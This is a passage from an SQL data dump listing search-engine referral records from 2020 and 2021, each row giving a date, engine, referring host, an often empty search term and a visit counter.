(63,'2020-04-10','google','google.com','',1840),
(64,'2020-04-10','google','google.com','',1841),
(65,'2020-04-11','google','google.com','',1851),
(66,'2020-04-11','google','google.com','',1854),
(67,'2020-04-20','google','www.google.com','',1988),
(68,'2020-04-26','google','www.google.com','',2161),
(69,'2020-04-27','bing','www.bing.com','amazon',2166),
(70,'2020-04-29','bing','www.bing.com','amazon',2223),
(71,'2020-05-04','google','www.google.com','',2315),
(72,'2020-05-19','google','www.google.com','',2579),
(73,'2020-06-12','google','www.google.co.kr','',2937),
(74,'2020-06-22','google','www.google.com','',3118),
(75,'2020-06-23','google','www.google.it','',3132),
(76,'2020-06-24','google','www.google.com','',3180),
(77,'2020-06-25','google','www.google.com','',3198),
(78,'2020-06-28','google','www.google.com','',3258),
(79,'2020-07-01','google','www.google.com','',3342),
(80,'2020-07-01','google','www.google.com','',3344),
(81,'2020-07-01','google','www.google.com','',3349),
(82,'2020-07-03','google','www.google.com','',3381),
(83,'2020-07-06','google','www.google.com','',3425),
(84,'2020-07-06','google','www.google.com','',3427),
(85,'2020-07-09','google','www.google.com','',3469),
(86,'2020-07-11','google','www.google.com','',3541),
(87,'2020-07-13','bing','www.bing.com','amazon',3556),
(88,'2020-08-01','yandex','yandex.ru','',4002),
(89,'2020-08-11','google','www.google.com','',4207),
(90,'2020-08-17','google','www.google.com','',4307),
(91,'2020-08-25','google','www.google.com','',4435),
(92,'2020-09-04','google','www.google.com','',4661),
(93,'2020-09-05','google','www.google.com','',4695),
(94,'2020-09-10','google','www.google.com','',4786),
(95,'2020-09-27','google','www.google.com','',5155),
(96,'2020-10-02','google','www.google.com','',5325),
(97,'2020-10-05','google','www.google.com','',5416),
(98,'2020-10-08','google','www.google.com','',5509),
(99,'2020-10-12','google','www.google.com','',5628),
(100,'2020-10-13','google','www.google.com','',5638),
(101,'2020-10-20','google','www.google.bg','',5875),
(102,'2020-10-27','google','www.google.com','',6055),
(103,'2020-11-03','google','www.google.com','',6272),
(104,'2020-11-09','google','www.google.com','',6422),
(105,'2020-11-10','google','www.google.com','',6423),
(106,'2020-11-10','google','www.google.com','',6441),
(107,'2020-11-11','google','www.google.com','',6454),
(108,'2020-11-15','google','www.google.com','',6570),
(109,'2020-11-16','google','www.google.hr','',6587),
(110,'2020-11-17','google','www.google.com','',6595),
(111,'2020-11-17','google','www.google.com','',6598),
(112,'2020-11-17','google','www.google.com','',6602),
(113,'2020-11-19','google','www.google.com.tr','',6638),
(114,'2020-11-19','google','www.google.com','',6660),
(115,'2020-11-21','google','www.google.com','',6689),
(116,'2020-11-22','google','www.google.com','',6742),
(117,'2020-11-23','google','www.google.com','',6768),
(118,'2020-11-23','google','www.google.com','',6789),
(119,'2020-11-24','google','www.google.com','',6801),
(120,'2020-11-26','google','www.google.com','',6881),
(121,'2020-11-26','google','www.google.com','',6883),
(122,'2020-11-28','google','www.google.com','',6940),
(123,'2020-11-29','google','www.google.com','',6959),
(124,'2020-12-05','google','www.google.com','',6997),
(125,'2020-12-07','google','www.google.com','',7031),
(126,'2020-12-08','google','www.google.com','',7079),
(127,'2020-12-09','google','www.google.com','',7114),
(128,'2020-12-11','google','www.google.com','',7134),
(129,'2020-12-12','google','www.google.com','',7178),
(130,'2020-12-15','google','www.google.com','',7227),
(131,'2020-12-15','google','www.google.com','',7246),
(132,'2020-12-21','google','www.google.com','',7362),
(133,'2020-12-23','google','www.google.com','',7400),
(134,'2020-12-23','google','www.google.com','',7418),
(135,'2020-12-25','google','www.google.com','',7448),
(136,'2020-12-26','google','www.google.com','',7475),
(137,'2020-12-26','google','www.google.com','',7475),
(138,'2020-12-30','google','www.google.com','',7572),
(139,'2021-01-01','google','www.google.com','',7639),
(140,'2021-01-03','google','www.google.com','',7718),
(141,'2021-01-05','google','www.google.com','',7774),
(142,'2021-01-06','google','www.google.com','',7806),
(143,'2021-01-07','google','www.google.com','',7817),
(144,'2021-01-07','google','www.google.com','',7840),
(145,'2021-01-07','google','www.google.com','',7840),
(146,'2021-01-08','google','www.google.com','',7865),
(147,'2021-01-08','google','www.google.ru','',7866),
(148,'2021-01-08','google','www.google.ru','',7866),
(149,'2021-01-08','google','www.google.com','',7868),
(150,'2021-01-09','google','www.google.com','',7888),
(151,'2021-01-09','google','www.google.com','',7888),
(152,'2021-01-09','google','www.google.com','',7889),
(153,'2021-01-10','google','www.google.com','',7948),
(154,'2021-01-11','google','www.google.com','',7983),
(155,'2021-01-12','google','www.google.com','',8007),
(156,'2021-01-12','google','www.google.com','',8018),
(157,'2021-01-13','google','www.google.com','',8047),
(158,'2021-01-13','google','www.google.com','',8049),
(159,'2021-01-13','google','www.google.com','',8050),
(160,'2021-01-14','google','www.google.com','',8063),
(161,'2021-01-14','google','www.google.com','',8069),
(162,'2021-01-14','google','www.google.com','',8073),
(163,'2021-01-14','google','www.google.com','',8079),
(164,'2021-01-15','google','www.google.com','',8094),
(165,'2021-01-15','google','www.google.com','',8121),
(166,'2021-01-16','google','www.google.com','',8147),
(167,'2021-01-16','google','www.google.com','',8160),
(168,'2021-01-17','google','www.google.com','',8182),
(169,'2021-01-17','google','www.google.com','',8182),
(170,'2021-01-18','google','www.google.com','',8205),
(171,'2021-01-19','google','www.google.com','',8223),
(172,'2021-01-19','google','www.google.com','',8225),
(173,'2021-01-23','google','www.google.com','',8248),
(174,'2021-01-23','google','www.google.co.kr','',8255),
(175,'2021-01-23','google','www.google.com','',8260),
(176,'2021-01-25','google','www.google.com','',8319),
(177,'2021-01-25','google','www.google.com','',8325),
(178,'2021-01-26','google','www.google.com','',8343),
(179,'2021-01-26','google','www.google.com','',8357),
(180,'2021-01-27','google','www.google.com','',8370),
(181,'2021-01-27','google','www.google.com','',8392),
(182,'2021-01-28','google','www.google.com','',8399),
(183,'2021-01-29','google','www.google.com','',8436),
(184,'2021-01-30','google','www.google.com','',8477),
(185,'2021-01-30','google','www.google.com','',8483),
(186,'2021-01-30','google','www.google.com','',8483),
(187,'2021-01-30','google','www.google.com','',8483),
(188,'2021-02-02','google','www.google.com','',8571),
(189,'2021-02-03','google','google.com','',8601),
(190,'2021-02-04','google','www.google.com','',8627),
(191,'2021-02-05','google','www.google.com','',8658),
(192,'2021-02-05','google','www.google.com','',8662),
(193,'2021-02-05','google','www.google.com','',8663),
(194,'2021-02-06','google','www.google.com','',8685),
(195,'2021-02-07','google','www.google.com','',8722),
(196,'2021-02-07','google','www.google.com','',8725),
(197,'2021-02-07','google','www.google.com','',8731),
(198,'2021-02-07','google','www.google.com','',8731),
(199,'2021-02-07','google','www.google.com','',8731),
(200,'2021-02-07','google','www.google.com','',8734),
(201,'2021-02-07','google','www.google.com','',8736),
(202,'2021-02-08','google','www.google.com','',8754),
(203,'2021-02-08','google','www.google.com','',8760),
(204,'2021-02-08','google','www.google.com','',8773),
(205,'2021-02-09','google','www.google.com','',8783),
(206,'2021-02-09','google','www.google.com','',8783),
(207,'2021-02-09','google','www.google.com','',8807),
(208,'2021-02-10','google','www.google.ru','',8816),
(209,'2021-02-10','google','www.google.com','',8825),
(210,'2021-02-10','google','www.google.com','',8838),
(211,'2021-02-11','bing','www.bing.com','',8847),
(212,'2021-02-11','google','www.google.com','',8859),
(213,'2021-02-11','google','www.google.com','',8902),
(214,'2021-02-11','google','www.google.com','',8902),
(215,'2021-02-11','google','www.google.com','',8902),
(216,'2021-02-11','google','www.google.com','',8902),
(217,'2021-02-11','google','www.google.com','',8902),
(218,'2021-02-11','google','www.google.com','',8902),
(219,'2021-02-11','google','www.google.com','',8902),
(220,'2021-02-11','google','www.google.com','',8902),
(221,'2021-02-11','google','www.google.com','',8902),
(222,'2021-02-11','google','www.google.com','',8902),
(223,'2021-02-11','google','www.google.com','',8902),
(224,'2021-02-11','google','www.google.com','',8902),
(225,'2021-02-11','google','www.google.com','',8902),
(226,'2021-02-11','google','www.google.com','',8902),
(227,'2021-02-11','google','www.google.com','',8902),
(228,'2021-02-13','google','www.google.ru','',8962),
(229,'2021-02-14','duckduckgo','duckduckgo.com','',8966),
(230,'2021-02-15','google','www.google.com','',8997),
(231,'2021-02-15','google','www.google.com','',9021),
(232,'2021-02-16','google','www.google.com','',9058),
(233,'2021-02-16','google','www.google.com','',9073),
(234,'2021-02-18','google','www.google.com','',9107),
(235,'2021-02-20','google','www.google.com','',9146),
(236,'2021-02-20','google','www.google.com','',9147),
(237,'2021-02-20','duckduckgo','duckduckgo.com','',9149),
(238,'2021-02-21','google','www.google.com','',9169),
(239,'2021-02-21','duckduckgo','duckduckgo.com','',9193),
(240,'2021-02-22','google','www.google.com','',9205),
(241,'2021-02-23','google','www.google.com','',9241),
(242,'2021-02-23','google','www.google.com','',9245),
(243,'2021-02-23','google','www.google.com','',9256),
(244,'2021-02-23','google','www.google.com','',9259),
(245,'2021-02-24','google','www.google.com','',9299),
(246,'2021-02-24','google','www.google.com','',9300),
(247,'2021-02-26','google','www.google.com','',9348),
(248,'2021-02-27','google','www.google.ca','',9379),
(249,'2021-02-27','duckduckgo','duckduckgo.com','',9387),
(250,'2021-02-27','google','www.google.com','',9388),
(251,'2021-02-27','duckduckgo','duckduckgo.com','',9390),
(252,'2021-02-27','duckduckgo','duckduckgo.com','',9393),
(253,'2021-02-28','google','www.google.com','',9411),
(254,'2021-02-28','google','www.google.com','',9431),
(255,'2021-03-02','google','www.google.com','',9495),
(256,'2021-03-02','google','www.google.com','',9505),
(257,'2021-03-02','google','www.google.com','',9495),
(258,'2021-03-02','google','www.google.com','',9513),
(259,'2021-03-03','duckduckgo','duckduckgo.com','',9540),
(260,'2021-03-03','google','www.google.fr','',9542),
(261,'2021-03-03','google','www.google.com','',9551),
(262,'2021-03-04','google','www.google.com','',9568),
(263,'2021-03-04','google','www.google.com','',9568),
(264,'2021-03-04','google','www.google.com','',9594),
(265,'2021-03-05','google','www.google.com','',9618),
(266,'2021-03-05','duckduckgo','duckduckgo.com','',9624),
(267,'2021-03-06','google','www.google.com','',9656),
(268,'2021-03-07','google','www.google.com','',9676),
(269,'2021-03-07','google','www.google.com','',9696),
(270,'2021-03-08','google','www.google.com','',9711),
(271,'2021-03-08','google','www.google.com','',9717),
(272,'2021-03-10','google','www.google.com','',9764),
(273,'2021-03-10','duckduckgo','duckduckgo.com','',9767),
(274,'2021-03-11','google','www.google.com','',9788),
(275,'2021-03-11','duckduckgo','duckduckgo.com','',9795),
(276,'2021-03-11','duckduckgo','duckduckgo.com','',9795),
(277,'2021-03-12','google','www.google.ru','',9800),
(278,'2021-03-13','google','www.google.com','',9816),
(279,'2021-03-13','google','www.google.com','',9817),
(280,'2021-03-13','duckduckgo','duckduckgo.com','',9841),
(281,'2021-03-13','google','www.google.com','',9848),
(282,'2021-03-15','duckduckgo','duckduckgo.com','',9874),
(283,'2021-03-16','google','www.google.com','',9911),
(284,'2021-03-16','google','www.google.ru','',9915),
(285,'2021-03-16','google','www.google.ru','',9915),
(286,'2021-03-17','bing','www.bing.com','',9950),
(287,'2021-03-18','google','www.google.com','',9956),
(288,'2021-03-18','google','www.google.com','',9960),
(289,'2021-03-18','google','www.google.com','',9960),
(290,'2021-03-18','google','www.google.com','',9960),
(291,'2021-03-18','google','www.google.com','',9960),
(292,'2021-03-18','google','www.google.com','',9960),
(293,'2021-03-18','google','www.google.com','',9960),
(294,'2021-03-18','google','www.google.com','',9960),
(295,'2021-03-18','google','www.google.com','',9960),
(296,'2021-03-18','google','www.google.com','',9960),
(297,'2021-03-18','google','www.google.com','',9960),
(298,'2021-03-18','google','www.google.com','',9960),
(299,'2021-03-18','google','www.google.com','',9960),
(300,'2021-03-18','google','www.google.com','',9960),
(301,'2021-03-18','google','www.google.com','',9960),
(302,'2021-03-18','google','www.google.com','',9960),
(303,'2021-03-18','google','www.google.com','',9968),
(304,'2021-03-18','google','www.google.com','',9968),
(305,'2021-03-18','google','www.google.com','',9968),
(306,'2021-03-18','google','www.google.com','',9968),
(307,'2021-03-18','google','www.google.com','',9968),
(308,'2021-03-18','google','www.google.com','',9968),
(309,'2021-03-18','google','www.google.com','',9968),
(310,'2021-03-18','google','www.google.com','',9968),
(311,'2021-03-18','google','www.google.com','',9968),
(312,'2021-03-18','google','www.google.com','',9968),
(313,'2021-03-18','google','www.google.com','',9968),
(314,'2021-03-18','google','www.google.com','',9968),
(315,'2021-03-18','google','www.google.com','',9968),
(316,'2021-03-18','google','www.google.com','',9968),
(317,'2021-03-18','google','www.google.com','',9968),
(318,'2021-03-18','google','www.google.com','',9960),
(319,'2021-03-18','google','www.google.com','',9960),
(320,'2021-03-18','google','www.google.com','',9960),
(321,'2021-03-18','google','www.google.com','',9960),
(322,'2021-03-18','google','www.google.com','',9960),
(323,'2021-03-18','google','www.google.com','',9960),
(324,'2021-03-18','google','www.google.com','',9960),
(325,'2021-03-18','google','www.google.com','',9960),
(326,'2021-03-18','google','www.google.com','',9960),
(327,'2021-03-18','google','www.google.com','',9960),
(328,'2021-03-18','google','www.google.com','',9960),
(329,'2021-03-18','google','www.google.com','',9960),
(330,'2021-03-18','google','www.google.com','',9960),
(331,'2021-03-18','google','www.google.com','',9960),
(332,'2021-03-18','google','www.google.com','',9960),
(333,'2021-03-19','bing','www.bing.com','broadcom fix for fedora 33',9994),
(334,'2021-03-19','google','www.google.com','',9996),
(335,'2021-03-19','duckduckgo','duckduckgo.com','',10000),
(336,'2021-03-22','duckduckgo','duckduckgo.com','',10049),
(337,'2021-03-22','google','www.google.com','',10051),
(338,'2021-03-22','google','www.google.com','',10051),
(339,'2021-03-23','google','www.google.com','',10069),
(340,'2021-03-23','google','www.google.com','',10071),
(341,'2021-03-23','duckduckgo','duckduckgo.com','',10086),
(342,'2021-03-23','google','www.google.com','',10069),
(343,'2021-03-24','google','www.google.com','',10092),
(344,'2021-03-25','duckduckgo','duckduckgo.com','',10116),
(345,'2021-03-25','google','www.google.com','',10141),
(346,'2021-03-25','duckduckgo','duckduckgo.com','',10143),
(347,'2021-03-26','google','www.google.com','',10145),
(348,'2021-03-26','google','www.google.com','',10146),
(349,'2021-03-26','google','www.google.com','',10154),
(350,'2021-03-26','google','www.google.com','',10146),
(351,'2021-03-27','google','www.google.com','',10171),
(352,'2021-03-27','google','www.google.com','',10178),
(353,'2021-03-29','duckduckgo','duckduckgo.com','',10213),
(354,'2021-03-29','duckduckgo','duckduckgo.com','',10214),
(355,'2021-03-30','google','www.google.com','',10256),
(356,'2021-03-30','google','www.google.com','',10256),
(357,'2021-03-30','duckduckgo','duckduckgo.com','',10260),
(358,'2021-04-01','google','www.google.com','',10309),
(359,'2021-04-01','google','www.google.com','',10309),
(360,'2021-04-01','google','www.google.com','',10313),
(361,'2021-04-01','google','www.google.com','',10313),
(362,'2021-04-03','duckduckgo','duckduckgo.com','',10347),
(363,'2021-04-03','bing','www.bing.com','',10354),
(364,'2021-04-03','google','www.google.com','',10359),
(365,'2021-04-05','duckduckgo','duckduckgo.com','',10425),
(366,'2021-04-08','duckduckgo','duckduckgo.com','',10512),
(367,'2021-04-09','bing','cn.bing.com','',10533),
(368,'2021-04-09','bing','cn.bing.com','',10534),
(369,'2021-04-09','google','www.google.com','',10539),
(370,'2021-04-09','google','www.google.com','',10539),
(371,'2021-04-09','google','www.google.com','',10539),
(372,'2021-04-09','google','www.google.com','',10539),
(373,'2021-04-09','google','www.google.com','',10553),
(374,'2021-04-10','duckduckgo','duckduckgo.com','',10569),
(375,'2021-04-10','google','www.google.com','',10621),
(376,'2021-04-10','google','www.google.hu','',10630),
(377,'2021-04-11','google','www.google.com','',10676),
(378,'2021-04-11','google','www.google.com','',10676),
(379,'2021-04-14','google','www.google.com','',10793),
(380,'2021-04-14','google','www.google.com','',10796),
(381,'2021-04-14','google','www.google.com','',10793),
(382,'2021-04-15','google','www.google.com','',10831),
(383,'2021-04-15','google','www.google.com','',10861),
(384,'2021-04-16','duckduckgo','duckduckgo.com','',10868),
(385,'2021-04-16','google','www.google.com','',10876),
(386,'2021-04-17','google','www.google.com','',10899),
(387,'2021-04-18','google','www.google.com','',10923),
(388,'2021-04-19','google','www.google.com','',10932),
(389,'2021-04-19','google','google.com','',10945),
(390,'2021-04-20','duckduckgo','duckduckgo.com','',10956),
(391,'2021-04-21','google','www.google.com','',10971),
(392,'2021-04-23','bing','cn.bing.com','',11021),
(393,'2021-04-23','google','www.google.com','',11032),
(394,'2021-04-24','duckduckgo','duckduckgo.com','',11059),
(395,'2021-04-24','google','www.google.com.ar','',11060),
(396,'2021-04-25','google','www.google.com','',11071),
(397,'2021-04-25','duckduckgo','duckduckgo.com','',11076),
(398,'2021-04-26','google','www.google.com','',11088),
(399,'2021-04-27','google','www.google.com','',11154),
(400,'2021-04-28','google','www.google.co.jp','',11159),
(401,'2021-04-28','google','www.google.com','',11167),
(402,'2021-04-28','google','www.google.com','',11169),
(403,'2021-04-29','google','www.google.ru','',11186),
(404,'2021-04-29','google','www.google.com','',11186),
(405,'2021-04-29','google','www.google.ru','',11186),
(406,'2021-04-29','google','www.google.ru','',11186),
(407,'2021-04-29','google','www.google.com','',11195),
(408,'2021-04-30','google','www.google.com','',11207),
(409,'2021-04-30','google','www.google.com','',11216),
(410,'2021-04-30','google','www.google.com','',11227),
(411,'2021-05-01','google','google.com','',11236),
(412,'2021-05-01','google','www.google.com','',11240),
(413,'2021-05-01','google','www.google.com','',11242),
(414,'2021-05-01','google','www.google.com','',11243),
(415,'2021-05-01','google','www.google.com','',11247),
(416,'2021-05-01','google','www.google.com','',11247),
(417,'2021-05-01','google','www.google.com','',11255),
(418,'2021-05-01','google','www.google.com','',11256),
(419,'2021-05-02','google','www.google.com','',11262),
(420,'2021-05-04','google','www.google.com','',11321),
(421,'2021-05-04','duckduckgo','duckduckgo.com','',11322),
(422,'2021-05-05','duckduckgo','duckduckgo.com','',11337),
(423,'2021-05-05','google','www.google.com','',11339),
(424,'2021-05-05','google','www.google.com','',11339),
(425,'2021-05-05','google','www.google.com','',11340),
(426,'2021-05-05','google','www.google.com','',11341),
(427,'2021-05-06','google','www.google.com','',11378),
(428,'2021-05-07','google','google.com','',11389),
(429,'2021-05-07','duckduckgo','duckduckgo.com','',11394),
(430,'2021-05-09','google','www.google.com','',11445),
(431,'2021-05-10','bing','cn.bing.com','',11471),
(432,'2021-05-12','google','www.google.com','',11522),
(433,'2021-05-12','bing','cn.bing.com','',11525),
(434,'2021-05-12','bing','cn.bing.com','',11525),
(435,'2021-05-12','google','www.google.com','',11541),
(436,'2021-05-12','google','www.google.com','',11541),
(437,'2021-05-12','google','www.google.com','',11541),
(438,'2021-05-12','google','www.google.com','',11541),
(439,'2021-05-12','google','www.google.com','',11541),
(440,'2021-05-12','google','www.google.com','',11541),
(441,'2021-05-12','google','www.google.com','',11541),
(442,'2021-05-12','google','www.google.com','',11541),
(443,'2021-05-12','google','www.google.com','',11541),
(444,'2021-05-12','google','www.google.com','',11541),
(445,'2021-05-12','google','www.google.com','',11541),
(446,'2021-05-12','google','www.google.com','',11541),
(447,'2021-05-12','google','www.google.com','',11541),
(448,'2021-05-12','google','www.google.com','',11541),
(449,'2021-05-12','google','www.google.com','',11541),
(450,'2021-05-12','google','www.google.com','',11541),
(451,'2021-05-12','google','www.google.com','',11541),
(452,'2021-05-12','google','www.google.com','',11541),
(453,'2021-05-12','google','www.google.com','',11541),
(454,'2021-05-12','google','www.google.com','',11541),
(455,'2021-05-12','google','www.google.com','',11541),
(456,'2021-05-12','google','www.google.com','',11541),
(457,'2021-05-12','google','www.google.com','',11541),
(458,'2021-05-12','google','www.google.com','',11541),
(459,'2021-05-12','google','www.google.com','',11541),
(460,'2021-05-12','google','www.google.com','',11541),
(461,'2021-05-12','google','www.google.com','',11541),
(462,'2021-05-12','google','www.google.com','',11541),
(463,'2021-05-12','google','www.google.com','',11541),
(464,'2021-05-12','google','www.google.com','',11541),
(465,'2021-05-12','google','www.google.com','',11541),
(466,'2021-05-12','google','www.google.com','',11541),
(467,'2021-05-12','google','www.google.com','',11541),
(468,'2021-05-12','google','www.google.com','',11541),
(469,'2021-05-12','google','www.google.com','',11541),
(470,'2021-05-12','google','www.google.com','',11541),
(471,'2021-05-12','google','www.google.com','',11541),
(472,'2021-05-12','google','www.google.com','',11541),
(473,'2021-05-12','google','www.google.com','',11541),
(474,'2021-05-12','google','www.google.com','',11541),
(475,'2021-05-12','google','www.google.com','',11541),
(476,'2021-05-12','google','www.google.com','',11541),
(477,'2021-05-13','google','www.google.com','',11556),
(478,'2021-05-13','duckduckgo','duckduckgo.com','',11559),
(479,'2021-05-13','google','www.google.com','',11560),
(480,'2021-05-14','google','www.google.com','',11570),
(481,'2021-05-14','google','google.com','',11575),
(482,'2021-05-14','bing','cn.bing.com','',11577),
(483,'2021-05-14','google','www.google.com','',11580),
(484,'2021-05-14','google','www.google.com','',11580),
(485,'2021-05-14','google','www.google.com','',11582),
(486,'2021-05-15','google','www.google.com','',11593),
(487,'2021-05-15','google','www.google.com','',11593),
(488,'2021-05-15','duckduckgo','duckduckgo.com','',11609),
(489,'2021-05-18','google','www.google.com','',11671),
(490,'2021-05-18','google','www.google.com','',11671),
(491,'2021-05-18','google','www.google.com','',11671),
(492,'2021-05-18','google','www.google.com','',11678),
(493,'2021-05-18','google','www.google.com','',11688),
(494,'2021-05-19','google','www.google.com','',11691),
(495,'2021-06-26','google','www.google.com','',11757),
(496,'2021-06-26','google','www.google.com','',11757),
(497,'2021-06-28','google','www.google.com','',11792),
(498,'2021-06-28','google','www.google.com','',11792),
(499,'2021-06-28','google','www.google.com','',11795),
(500,'2021-06-29','google','www.google.com','',11818),
(501,'2021-06-29','google','www.google.com','',11818),
(502,'2021-06-29','google','www.google.com','',11821),
(503,'2021-06-29','google','www.google.com','',11821),
(504,'2021-06-30','google','google.com','',11845),
(505,'2021-06-30','google','google.com','',11845),
(506,'2021-07-01','google','www.google.com','',11868),
(507,'2021-07-01','google','www.google.com','',11874),
(508,'2021-07-01','google','www.google.com','',11874),
(509,'2021-07-02','google','www.google.com','',11892),
(510,'2021-07-02','google','www.google.com','',11892),
(511,'2021-07-02','google','www.google.com','',11901),
(512,'2021-07-02','google','www.google.com','',11901),
(513,'2021-07-05','google','www.google.com','',11988),
(514,'2021-07-05','google','www.google.com','',11988),
(515,'2021-07-05','google','www.google.com','',11988),
(516,'2021-07-06','google','www.google.com','',12009),
(517,'2021-07-06','google','www.google.com','',12009),
(518,'2021-07-08','duckduckgo','duckduckgo.com','',12040),
(519,'2021-07-08','duckduckgo','duckduckgo.com','',12040),
(520,'2021-07-08','duckduckgo','duckduckgo.com','',12040),
(521,'2021-07-08','duckduckgo','duckduckgo.com','',12040),
(522,'2021-07-08','duckduckgo','duckduckgo.com','',12040),
(523,'2021-07-08','duckduckgo','duckduckgo.com','',12040),
(524,'2021-07-10','google','www.google.com','',12105),
(525,'2021-07-10','google','www.google.com','',12105),
(526,'2021-07-10','google','www.google.com','',12106),
(527,'2021-07-10','google','www.google.com','',12106),
(528,'2021-07-10','google','www.google.com','',12125),
(529,'2021-07-10','google','www.google.com','',12125),
(530,'2021-07-13','duckduckgo','duckduckgo.com','',12168),
(531,'2021-07-13','duckduckgo','duckduckgo.com','',12168),
(532,'2021-07-13','duckduckgo','duckduckgo.com','',12168),
(533,'2021-07-13','duckduckgo','duckduckgo.com','',12168),
(534,'2021-07-13','duckduckgo','duckduckgo.com','',12170),
(535,'2021-07-13','duckduckgo','duckduckgo.com','',12170),
(536,'2021-07-14','duckduckgo','duckduckgo.com','',12193),
(537,'2021-07-14','duckduckgo','duckduckgo.com','',12193),
(538,'2021-07-14','google','www.google.com','',12196),
(539,'2021-07-14','google','www.google.com','',12204),
(540,'2021-07-14','google','www.google.com','',12204),
(541,'2021-07-14','google','www.google.com','',12209),
(542,'2021-07-14','google','www.google.com','',12209),
(543,'2021-07-15','google','www.google.com','',12237),
(544,'2021-07-15','google','www.google.com','',12237),
(545,'2021-07-16','google','www.google.com','',12269),
(546,'2021-07-16','google','www.google.com','',12269),
(547,'2021-07-17','google','www.google.com','',12278),
(548,'2021-07-19','bing','www.bing.com','',12323),
(549,'2021-07-19','bing','www.bing.com','',12323),
(550,'2021-07-20','duckduckgo','duckduckgo.com','',12350),
(551,'2021-07-20','duckduckgo','duckduckgo.com','',12350),
(552,'2021-07-21','google','www.google.com','',12355),
(553,'2021-07-21','google','www.google.com','',12355),
(554,'2021-07-21','google','www.google.com','',12355),
(555,'2021-07-21','google','www.google.com','',12355),
(556,'2021-07-21','google','www.google.com','',12355),
(557,'2021-07-21','google','www.google.com','',12355),
(558,'2021-07-21','google','www.google.com','',12360),
(559,'2021-07-21','google','www.google.com','',12360),
(560,'2021-07-22','google','www.google.com','',12379),
(561,'2021-07-22','google','www.google.com','',12379),
(562,'2021-07-28','google','www.google.com','',12503),
(563,'2021-08-12','google','www.google.com','',12826),
(564,'2021-08-12','google','www.google.com','',12838),
(565,'2021-08-12','google','www.google.com','',12838),
(566,'2021-08-18','google','www.google.com','',12960),
(567,'2021-08-18','google','www.google.com','',12960),
(568,'2021-08-18','google','www.google.com','',12960),
(569,'2021-08-18','google','www.google.com','',12960),
(570,'2021-08-18','google','www.google.com','',12960),
(571,'2021-08-19','duckduckgo','duckduckgo.com','',12975),
(572,'2021-08-19','google','www.google.com','',12977),
(573,'2021-08-19','google','www.google.com','',12977),
(574,'2021-08-19','google','www.google.com','',12989),
(575,'2021-08-19','google','www.google.com','',12989),
(576,'2021-08-19','google','www.google.com','',12989),
(577,'2021-08-19','google','www.google.com','',12989),
(578,'2021-08-19','google','www.google.com','',12989),
(579,'2021-08-20','google','www.google.com','',12995),
(580,'2021-08-20','google','www.google.com','',12995),
(581,'2021-08-20','google','www.google.com','',12995),
(582,'2021-08-20','google','www.google.com','',12995),
(583,'2021-08-20','google','www.google.com','',12995),
(584,'2021-08-22','google','www.google.com','',13045),
(585,'2021-08-22','google','www.google.com','',13045),
(586,'2021-08-23','google','www.google.com','',13077),
(587,'2021-08-27','google','www.google.com','',13185),
(588,'2021-08-30','google','www.google.com','',13249),
(589,'2021-08-30','google','www.google.com','',13254),
(590,'2021-09-02','google','www.google.com','',13319),
(591,'2021-09-02','google','www.google.com','',13319),
(592,'2021-09-05','google','www.google.com','',13387),
(593,'2021-09-05','google','www.google.com','',13387),
(594,'2021-09-11','duckduckgo','duckduckgo.com','',13512),
(595,'2021-09-11','duckduckgo','duckduckgo.com','',13512),
(596,'2021-09-12','google','google.com','',13542),
(597,'2021-09-12','google','google.com','',13542),
(598,'2021-09-13','google','www.google.com','',13556),
(599,'2021-09-13','google','www.google.com','',13561),
(600,'2021-09-13','google','www.google.com','',13561),
(601,'2021-09-13','google','www.google.com','',13561),
(602,'2021-09-13','google','www.google.com','',13574),
(603,'2021-09-13','google','www.google.com','',13574),
(604,'2021-09-13','google','www.google.com','',13574),
(605,'2021-09-14','google','www.google.com','',13598),
(606,'2021-09-20','bing','www.bing.com','',13727),
(607,'2021-09-21','google','google.com','',13746),
(608,'2021-09-21','google','google.com','',13746),
(609,'2021-09-22','bing','www.bing.com','',13773),
(610,'2021-09-23','google','www.google.com','',13798),
(611,'2021-09-26','google','www.google.com','',13875),
(612,'2021-09-29','google','www.google.com','',13965),
(613,'2021-09-29','google','www.google.com','',13968),
(614,'2021-09-30','google','www.google.com','',13994),
(615,'2021-10-01','duckduckgo','duckduckgo.com','',14031),
(616,'2021-10-04','google','www.google.com','',14088),
(617,'2021-10-04','google','www.google.com','',14094),
(618,'2021-10-05','google','www.google.com','',14118),
(619,'2021-10-10','bing','www.bing.com','',14230),
(620,'2021-10-11','bing','www.bing.com','',14250),
(621,'2021-10-11','google','www.google.com','',14266),
(622,'2021-10-13','google','www.google.com','',14302),
(623,'2021-10-16','google','www.google.com','',14377),
(624,'2021-10-16','google','www.google.com','',14386),
(625,'2021-10-20','google','www.google.com','',14459),
(626,'2021-10-20','bing','www.bing.com','',14465),
(627,'2021-10-21','duckduckgo','duckduckgo.com','',14493),
(628,'2021-10-25','google','www.google.com','',14576),
(629,'2021-10-26','bing','www.bing.com','',14604),
(630,'2021-10-26','google','www.google.com','',14611),
(631,'2021-10-29','google','www.google.com','',14698),
(632,'2021-10-29','google','www.google.com','',14698),
(633,'2021-10-30','google','www.google.com','',14711),
(634,'2021-11-04','google','www.google.com','',14797),
(635,'2021-11-04','google','www.google.com','',14803),
(636,'2021-11-04','google','www.google.com','',14803),
(637,'2021-11-04','google','www.google.com','',14803),
(638,'2021-11-05','bing','www.bing.com','',14844),
(639,'2021-11-08','bing','www.bing.com','',14931),
(640,'2021-11-09','google','www.google.com','',14950),
(641,'2021-11-09','google','www.google.com','',14966),
(642,'2021-11-10','google','www.google.com','',14993),
(643,'2021-11-10','google','www.google.com','',14995),
(644,'2021-11-11','google','www.google.com','',15028),
(645,'2021-11-13','google','www.google.com','',15071),
(646,'2021-11-15','google','www.google.com','',15120),
(647,'2021-11-17','google','www.google.com','',15174),
(648,'2021-11-18','bing','www.bing.com','',15192),
(649,'2021-11-19','bing','www.bing.com','',15217),
(650,'2021-11-19','google','www.google.com','',15241),
(651,'2021-11-20','google','www.google.com','',15254),
(652,'2021-11-20','google','www.google.com','',15255),
(653,'2021-11-20','google','www.google.com','',15257),
(654,'2021-11-20','yahoo','uk.search.yahoo.com','',15310),
(655,'2021-11-20','yahoo','uk.search.yahoo.com','',15310),
(656,'2021-11-20','google','www.google.com','',15345),
(657,'2021-11-22','google','www.google.com','',15524),
(658,'2021-11-23','google','www.google.com','',15557),
(659,'2021-11-24','google','www.google.com','',15859),
(660,'2021-11-24','google','www.google.com','',15859),
(661,'2021-11-25','google','www.google.com','',15917),
(662,'2021-11-26','google','www.google.com','',16144),
(663,'2021-11-27','bing','www.bing.com','',16216),
(664,'2021-11-27','google','www.google.com','',16234),
